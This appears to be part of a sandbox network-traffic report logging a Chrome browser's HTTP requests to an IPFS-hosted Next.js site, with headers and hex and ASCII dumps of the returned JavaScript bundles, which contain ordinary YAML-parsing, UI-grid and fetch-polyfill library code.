                                                                                                                                                                                                                                                  Data Ascii: s=module.exports;engines.yaml={parse:yaml.safeLoad.bind(yaml),stringify:yaml.safeDump.bind(yaml)},engines.json={parse:JSON.parse.bind(JSON),stringify:function(t,e){const n=Object.assign({replacer:null,space:2},e);return JSON.stringify(t,n.replacer,n.space
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 65 28 2d 31 29 3f 74 2b 22 5c 6e 22 3a 74 7d 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 69 66 28 6e 75 6c 6c 3d 3d 65 26 26 6e 75 6c 6c 3d 3d 6e 29 73 77 69 74 63 68 28 72 28 74 29 29 7b 63 61 73 65 22 6f 62 6a 65 63 74 22 3a 65 3d 74 2e 64 61 74 61 2c 6e 3d 7b 7d 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 74 72 69 6e 67 22 3a 72 65 74 75 72 6e 20 74 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 65 78 70 65 63 74 65 64 20 66 69 6c 65 20 74 6f 20 62 65 20 61 20 73 74 72 69 6e 67 20 6f 72 20 6f 62 6a 65 63 74 22 29 7d 63 6f 6e 73 74 20 73 3d 74 2e 63 6f 6e 74 65 6e 74 2c 63 3d 6f 28 6e 29 3b 69 66 28 6e 75 6c 6c 3d 3d 65 29 7b 69 66 28 21 63 2e 64 61 74 61 29 72 65 74 75 72 6e 20 74
                                                                                                                                                                                                                                                  Data Ascii: e(-1)?t+"\n":t}t.exports=function(t,e,n){if(null==e&&null==n)switch(r(t)){case"object":e=t.data,n={};break;case"string":return t;default:throw new TypeError("expected file to be a string or object")}const s=t.content,c=o(n);if(null==e){if(!c.data)return t
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 6e 22 62 75 66 66 65 72 22 3d 3d 3d 6f 28 74 29 7d 2c 65 2e 69 73 4f 62 6a 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 6f 62 6a 65 63 74 22 3d 3d 3d 6f 28 74 29 7d 2c 65 2e 74 6f 42 75 66 66 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 74 3f 72 2e 66 72 6f 6d 28 74 29 3a 74 7d 2c 65 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 65 2e 69 73 42 75 66 66 65 72 28 74 29 29 72 65 74 75 72 6e 20 69 28 53 74 72 69 6e 67 28 74 29 29 3b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 3d 74 79 70 65 6f 66 20 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 65 78 70 65 63 74 65 64 20 69 6e 70 75 74 20 74 6f 20 62 65 20 61 20 73 74
                                                                                                                                                                                                                                                  Data Ascii: n"buffer"===o(t)},e.isObject=function(t){return"object"===o(t)},e.toBuffer=function(t){return"string"===typeof t?r.from(t):t},e.toString=function(t){if(e.isBuffer(t))return i(String(t));if("string"!==typeof t)throw new TypeError("expected input to be a st
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 22 29 2c 74 2e 65 78 70 6f 72 74 73 2e 63 6f 6d 70 6f 73 65 3d 6f 28 22 63 6f 6d 70 6f 73 65 22 29 2c 74 2e 65 78 70 6f 72 74 73 2e 61 64 64 43 6f 6e 73 74 72 75 63 74 6f 72 3d 6f 28 22 61 64 64 43 6f 6e 73 74 72 75 63 74 6f 72 22 29 7d 2c 32 35 35 39 36 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 74 7c 7c 6e 75 6c 6c 3d 3d 3d 74 7d 74 2e 65 78 70 6f 72 74 73 2e 69 73 4e 6f 74 68 69 6e 67 3d 65 2c 74 2e 65 78 70 6f 72 74 73 2e 69 73 4f 62 6a 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 74 26 26 6e 75 6c 6c 21 3d 3d 74 7d 2c 74
                                                                                                                                                                                                                                                  Data Ascii: "),t.exports.compose=o("compose"),t.exports.addConstructor=o("addConstructor")},25596:function(t){"use strict";function e(t){return"undefined"===typeof t||null===t}t.exports.isNothing=e,t.exports.isObject=function(t){return"object"===typeof t&&null!==t},t
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 7c 21 31 2c 74 68 69 73 2e 66 6c 6f 77 4c 65 76 65 6c 3d 72 2e 69 73 4e 6f 74 68 69 6e 67 28 74 2e 66 6c 6f 77 4c 65 76 65 6c 29 3f 2d 31 3a 74 2e 66 6c 6f 77 4c 65 76 65 6c 2c 74 68 69 73 2e 73 74 79 6c 65 4d 61 70 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 2c 61 2c 73 2c 75 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 65 29 72 65 74 75 72 6e 7b 7d 3b 66 6f 72 28 6e 3d 7b 7d 2c 69 3d 30 2c 6f 3d 28 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 29 2e 6c 65 6e 67 74 68 3b 69 3c 6f 3b 69 2b 3d 31 29 61 3d 72 5b 69 5d 2c 73 3d 53 74 72 69 6e 67 28 65 5b 61 5d 29 2c 22 21 21 22 3d 3d 3d 61 2e 73 6c 69 63 65 28 30 2c 32 29 26 26 28 61 3d 22 74 61 67 3a 79 61 6d 6c 2e 6f 72 67 2c 32 30 30 32 3a 22 2b 61 2e 73 6c 69 63 65 28 32 29 29 2c
                                                                                                                                                                                                                                                  Data Ascii: |!1,this.flowLevel=r.isNothing(t.flowLevel)?-1:t.flowLevel,this.styleMap=function(t,e){var n,r,i,o,a,s,u;if(null===e)return{};for(n={},i=0,o=(r=Object.keys(e)).length;i<o;i+=1)a=r[i],s=String(e[a]),"!!"===a.slice(0,2)&&(a="tag:yaml.org,2002:"+a.slice(2)),
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 64 3d 6d 28 63 3d 74 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 29 26 26 36 35 32 37 39 21 3d 3d 63 26 26 21 67 28 63 29 26 26 34 35 21 3d 3d 63 26 26 36 33 21 3d 3d 63 26 26 35 38 21 3d 3d 63 26 26 34 34 21 3d 3d 63 26 26 39 31 21 3d 3d 63 26 26 39 33 21 3d 3d 63 26 26 31 32 33 21 3d 3d 63 26 26 31 32 35 21 3d 3d 63 26 26 33 35 21 3d 3d 63 26 26 33 38 21 3d 3d 63 26 26 34 32 21 3d 3d 63 26 26 33 33 21 3d 3d 63 26 26 31 32 34 21 3d 3d 63 26 26 36 31 21 3d 3d 63 26 26 36 32 21 3d 3d 63 26 26 33 39 21 3d 3d 63 26 26 33 34 21 3d 3d 63 26 26 33 37 21 3d 3d 63 26 26 36 34 21 3d 3d 63 26 26 39 36 21 3d 3d 63 26 26 21 67 28 74 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2e 6c 65 6e 67 74 68 2d 31 29 29 3b 69 66 28 65 29 66 6f 72 28 6f 3d 30 3b 6f 3c 74 2e 6c 65 6e 67
                                                                                                                                                                                                                                                  Data Ascii: d=m(c=t.charCodeAt(0))&&65279!==c&&!g(c)&&45!==c&&63!==c&&58!==c&&44!==c&&91!==c&&93!==c&&123!==c&&125!==c&&35!==c&&38!==c&&42!==c&&33!==c&&124!==c&&61!==c&&62!==c&&39!==c&&34!==c&&37!==c&&64!==c&&96!==c&&!g(t.charCodeAt(t.length-1));if(e)for(o=0;o<t.leng
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 6e 22 29 2b 6b 28 63 2c 65 29 2c 61 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 61 29 2c 6f 29 29 3b 63 61 73 65 20 35 3a 72 65 74 75 72 6e 27 22 27 2b 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 2c 6e 2c 72 2c 69 3d 22 22 2c 6f 3d 30 3b 6f 3c 74 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 28 65 3d 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 29 3e 3d 35 35 32 39 36 26 26 65 3c 3d 35 36 33 31 39 26 26 28 6e 3d 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2b 31 29 29 3e 3d 35 36 33 32 30 26 26 6e 3c 3d 35 37 33 34 33 3f 28 69 2b 3d 70 28 31 30 32 34 2a 28 65 2d 35 35 32 39 36 29 2b 6e 2d 35 36 33 32 30 2b 36 35 35 33 36 29 2c 6f 2b 2b 29 3a 69 2b 3d 21 28 72 3d 75 5b 65 5d 29 26 26 6d 28 65 29 3f 74 5b 6f 5d 3a 72 7c 7c 70 28 65 29 3b 72 65 74 75
                                                                                                                                                                                                                                                  Data Ascii: n")+k(c,e),a=n}return o}(e,a),o));case 5:return'"'+function(t){for(var e,n,r,i="",o=0;o<t.length;o++)(e=t.charCodeAt(o))>=55296&&e<=56319&&(n=t.charCodeAt(o+1))>=56320&&n<=57343?(i+=p(1024*(e-55296)+n-56320+65536),o++):i+=!(r=u[e])&&m(e)?t[o]:r||p(e);retu


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  123192.168.2.549847209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC504OUTGET /_next/static/chunks/9072-51cf922cfdeaf6b4.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1358INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:57 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 5383
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigqcxceifozam4kqw73apyu3sl5um4yb2c5yj7n772g2r56udct4y"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/9072-51cf922cfdeaf6b4.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreigqcxceifozam4kqw73apyu3sl5um4yb2c5yj7n772g2r56udct4y
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 209553
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 37 34 62 63 65 39 34 31 62 62 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e474bce941bb-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1306INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 30 37 32 5d 2c 7b 37 39 30 37 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 74 2e 64 28 6e 2c 7b 5a 50 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4e 7d 7d 29 3b 76 61 72 20 72 3d 74 28 36 33 33 36 36 29 2c 69 3d 74 28 38 37 34 36 32 29 2c 6f 3d 74 28 36 37 32 39 34 29 2c 61 3d 74 28 38 36 30 31 30 29 2c 73 3d 74 28 39 35 34 30 38 29 2c 63 3d 74 28 33 39 37 30 37 29 2c 70 3d 74 28 39 34 37 38 30 29 2c 75 3d 74 28 38 31 37 31 39 29 2c 6c 3d 74 28 37 38 38 38 34 29 2c 6d 3d 74 28 36 32 30 39 37 29 3b 76 61 72 20 64 3d 6f 2e 63
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9072],{79072:function(e,n,t){t.d(n,{ZP:function(){return N}});var r=t(63366),i=t(87462),o=t(67294),a=t(86010),s=t(95408),c=t(39707),p=t(94780),u=t(81719),l=t(78884),m=t(62097);var d=o.c
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 7b 63 6f 6e 74 61 69 6e 65 72 3a 72 2c 64 69 72 65 63 74 69 6f 6e 3a 69 2c 69 74 65 6d 3a 6f 2c 73 70 61 63 69 6e 67 3a 61 2c 77 72 61 70 3a 73 2c 7a 65 72 6f 4d 69 6e 57 69 64 74 68 3a 63 2c 62 72 65 61 6b 70 6f 69 6e 74 73 3a 70 7d 3d 74 3b 6c 65 74 20 75 3d 5b 5d 3b 72 26 26 28 75 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 3d 7b 7d 29 7b 69 66 28 21 65 7c 7c 65 3c 3d 30 29 72 65 74 75 72 6e 5b 5d 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 65 26 26 21 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 4e 75 6d 62 65 72 28 65 29 29 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 5b 74 5b 60 73 70 61 63 69 6e 67 2d 78 73 2d 24 7b 53 74 72 69 6e 67 28 65 29 7d 60 5d 5d 3b 63 6f 6e 73 74 20 72 3d 5b 5d 3b 72
                                                                                                                                                                                                                                                  Data Ascii: {container:r,direction:i,item:o,spacing:a,wrap:s,zeroMinWidth:c,breakpoints:p}=t;let u=[];r&&(u=function(e,n,t={}){if(!e||e<=0)return[];if("string"===typeof e&&!Number.isNaN(Number(e))||"number"===typeof e)return[t[`spacing-xs-${String(e)}`]];const r=[];r
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 7d 60 5d 3a 7b 70 61 64 64 69 6e 67 54 6f 70 3a 24 28 6f 29 7d 7d 3a 6e 75 6c 6c 21 3d 28 69 3d 74 29 26 26 69 2e 69 6e 63 6c 75 64 65 73 28 72 29 3f 7b 7d 3a 7b 6d 61 72 67 69 6e 54 6f 70 3a 30 2c 5b 60 26 20 3e 20 2e 24 7b 68 2e 69 74 65 6d 7d 60 5d 3a 7b 70 61 64 64 69 6e 67 54 6f 70 3a 30 7d 7d 7d 29 29 7d 72 65 74 75 72 6e 20 69 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 7b 74 68 65 6d 65 3a 65 2c 6f 77 6e 65 72 53 74 61 74 65 3a 6e 7d 29 7b 63 6f 6e 73 74 7b 63 6f 6e 74 61 69 6e 65 72 3a 74 2c 63 6f 6c 75 6d 6e 53 70 61 63 69 6e 67 3a 72 7d 3d 6e 3b 6c 65 74 20 69 3d 7b 7d 3b 69 66 28 74 26 26 30 21 3d 3d 72 29 7b 63 6f 6e 73 74 20 6e 3d 28 30 2c 73 2e 50 24 29 28 7b 76 61 6c 75 65 73 3a 72 2c 62 72 65 61 6b 70 6f 69 6e 74 73 3a 65 2e 62 72 65 61 6b 70
                                                                                                                                                                                                                                                  Data Ascii: }`]:{paddingTop:$(o)}}:null!=(i=t)&&i.includes(r)?{}:{marginTop:0,[`& > .${h.item}`]:{paddingTop:0}}}))}return i}),(function({theme:e,ownerState:n}){const{container:t,columnSpacing:r}=n;let i={};if(t&&0!==r){const n=(0,s.P$)({values:r,breakpoints:e.breakp
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1339INData Raw: 3d 65 3d 3e 7b 63 6f 6e 73 74 7b 63 6c 61 73 73 65 73 3a 6e 2c 63 6f 6e 74 61 69 6e 65 72 3a 74 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 69 74 65 6d 3a 69 2c 73 70 61 63 69 6e 67 3a 6f 2c 77 72 61 70 3a 61 2c 7a 65 72 6f 4d 69 6e 57 69 64 74 68 3a 73 2c 62 72 65 61 6b 70 6f 69 6e 74 73 3a 63 7d 3d 65 3b 6c 65 74 20 75 3d 5b 5d 3b 74 26 26 28 75 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 21 65 7c 7c 65 3c 3d 30 29 72 65 74 75 72 6e 5b 5d 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 65 26 26 21 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 4e 75 6d 62 65 72 28 65 29 29 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 5b 60 73 70 61 63 69 6e 67 2d 78 73 2d 24 7b 53 74 72 69 6e 67 28 65 29 7d 60 5d 3b
                                                                                                                                                                                                                                                  Data Ascii: =e=>{const{classes:n,container:t,direction:r,item:i,spacing:o,wrap:a,zeroMinWidth:s,breakpoints:c}=e;let u=[];t&&(u=function(e,n){if(!e||e<=0)return[];if("string"===typeof e&&!Number.isNaN(Number(e))||"number"===typeof e)return[`spacing-xs-${String(e)}`];


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  124192.168.2.549848209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC504OUTGET /_next/static/chunks/7091-73091706560db88e.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:57 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 57798
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreifsdl4lcp3ktsyksdcd3ijhxwomiycb344uwqmv3uvntnpwozlwwe"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/7091-73091706560db88e.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreifsdl4lcp3ktsyksdcd3ijhxwomiycb344uwqmv3uvntnpwozlwwe
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-02
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13026988
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 37 34 65 63 31 34 34 33 38 63 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e474ec14438c-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 30 39 31 5d 2c 7b 35 34 30 39 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 74 68 69 73 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 68 69 73 2e 66 65 74 63 68 3d 21 31 2c 74 68 69 73 2e 44 4f 4d 45 78 63 65 70 74 69 6f 6e 3d 6e 2e 44 4f 4d 45 78 63 65 70 74 69 6f 6e 7d 72 65 74 75 72 6e 20 65 2e 70 72 6f 74 6f 74 79 70 65 3d 6e 2c 6e 65 77 20 65 7d 28 29 3b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7091],{54098:function(e,t){var n="undefined"!==typeof self?self:this,i=function(){function e(){this.fetch=!1,this.DOMException=n.DOMException}return e.prototype=n,new e}();!function(e){!function(t){
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 74 68 69 73 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 69 66 28 65 2e 62 6f 64 79 55 73 65 64 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 6a 65 63 74 28 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 41 6c 72 65 61 64 79 20 72 65 61 64 22 29 29 3b 65 2e 62 6f 64 79 55 73 65 64 3d 21 30 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 65 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 65 2e 72 65 73 75 6c 74 29 7d 2c 65 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 28 65 2e 65 72 72 6f 72 29 7d 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 65 29 7b 76 61 72 20 74 3d 6e 65 77 20 46 69 6c 65 52 65 61 64 65 72 2c 6e 3d
                                                                                                                                                                                                                                                  Data Ascii: this)}function d(e){if(e.bodyUsed)return Promise.reject(new TypeError("Already read"));e.bodyUsed=!0}function f(e){return new Promise((function(t,n){e.onload=function(){t(e.result)},e.onerror=function(){n(e.error)}}))}function y(e){var t=new FileReader,n=
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 20 65 3d 64 28 74 68 69 73 29 3b 69 66 28 65 29 72 65 74 75 72 6e 20 65 3b 69 66 28 74 68 69 73 2e 5f 62 6f 64 79 42 6c 6f 62 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 74 68 69 73 2e 5f 62 6f 64 79 42 6c 6f 62 29 3b 69 66 28 74 68 69 73 2e 5f 62 6f 64 79 41 72 72 61 79 42 75 66 66 65 72 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6e 65 77 20 42 6c 6f 62 28 5b 74 68 69 73 2e 5f 62 6f 64 79 41 72 72 61 79 42 75 66 66 65 72 5d 29 29 3b 69 66 28 74 68 69 73 2e 5f 62 6f 64 79 46 6f 72 6d 44 61 74 61 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 63 6f 75 6c 64 20 6e 6f 74 20 72 65 61 64 20 46 6f 72 6d 44 61 74 61 20 62 6f 64 79 20 61 73 20 62 6c 6f 62 22 29 3b 72 65 74 75 72 6e 20 50 72 6f 6d 69
                                                                                                                                                                                                                                                  Data Ascii: e=d(this);if(e)return e;if(this._bodyBlob)return Promise.resolve(this._bodyBlob);if(this._bodyArrayBuffer)return Promise.resolve(new Blob([this._bodyArrayBuffer]));if(this._bodyFormData)throw new Error("could not read FormData body as blob");return Promi
